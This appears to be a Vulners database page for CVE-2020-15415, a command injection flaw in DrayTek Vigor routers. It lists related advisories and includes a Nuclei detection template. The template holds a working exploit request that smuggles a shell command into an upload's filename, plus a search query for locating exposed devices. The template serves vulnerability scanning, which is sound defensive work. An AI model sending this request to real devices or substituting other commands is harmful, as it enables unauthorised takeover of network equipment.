| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| CVE-2020-15415 | 30 Jun 202000:00 | – | attackerkb | |
| The vulnerability of the component cgi-bin/mainfunction.cgi/cvmcfgupload in the microprogramming software for DrayTek Vigor allows a hacker to execute arbitrary code. | 9 Oct 202400:00 | – | bdu_fstec | |
| CVE-2020-15415 | 19 Feb 202312:43 | – | circl | |
| DrayTek Multiple Vigor Routers OS Command Injection Vulnerability | 30 Sep 202400:00 | – | cisa_kev | |
| CISA Adds Four Known Exploited Vulnerabilities to Catalog | 8 Nov 202412:00 | – | cisa | |
| DrayTek Vigor3900, Vigor2960, and Vigor300B OS Command Injection Vulnerabilities (CNVD-2020-51416) | 1 Jul 202000:00 | – | cnvd | |
| DrayTek Command Injection (CVE-2020-15415) | 12 Jul 202000:00 | – | checkpoint_advisories | |
| CVE-2020-15415 | 30 Jun 202013:37 | – | cve | |
| CVE-2020-15415 | 30 Jun 202013:37 | – | cvelist | |
| CVE-2020-15415 | 30 Jun 202014:15 | – | nvd |
id: CVE-2020-15415
info:
name: DrayTek Vigor - Command Injection
author: ritikchaddha
severity: critical
description: |
DrayTek Vigor devices contain a command injection vulnerability in the cvmcfgupload functionality. The vulnerability allows remote attackers to execute arbitrary commands through specially crafted requests to the /cgi-bin/mainfunction.cgi/cvmcfgupload endpoint.
impact: |
Unauthenticated attackers can execute arbitrary system commands on DrayTek Vigor devices via the cvmcfgupload endpoint, leading to complete device compromise and potential network infiltration.
remediation: |
Update the firmware to the latest version provided by DrayTek. If no update is available, consider implementing network segmentation to restrict access to the device's management interface.
reference:
- https://github.com/CLP-team/Vigor-Commond-Injection
- https://nvd.nist.gov/vuln/detail/CVE-2020-15415
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-15415
cwe-id: CWE-78
epss-score: 0.84599
epss-percentile: 0.99674
cpe: cpe:2.3:h:draytek:vigor:-:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: draytek
product: vigor
fofa-query: '"excanvas.js" && "lang == \"zh-cn\"" && "detectLang" && server=="DWS"'
tags: cve,cve2020,draytek,rce,router,kev,vkev,vuln
http:
- raw:
- |
POST /cgi-bin/mainfunction.cgi/cvmcfgupload?1=2 HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
------WebKitFormBoundary
Content-Disposition: form-data; name="abc"; filename="t';id;echo '1_"
Content-Type: text/x-python-script
------WebKitFormBoundary--
matchers:
- type: dsl
dsl:
- regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body)
- contains(header, 'DWS')
- status_code == 200
condition: and
# digest: 4b0a00483046022100a406b04771007b1791a550fe3f6717b4891dc81ea506283aaade6dec6c408ec7022100d6b45a77e504132453bd64f67d433a513ee0bf42b31900db661a92e89fe85ea9:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation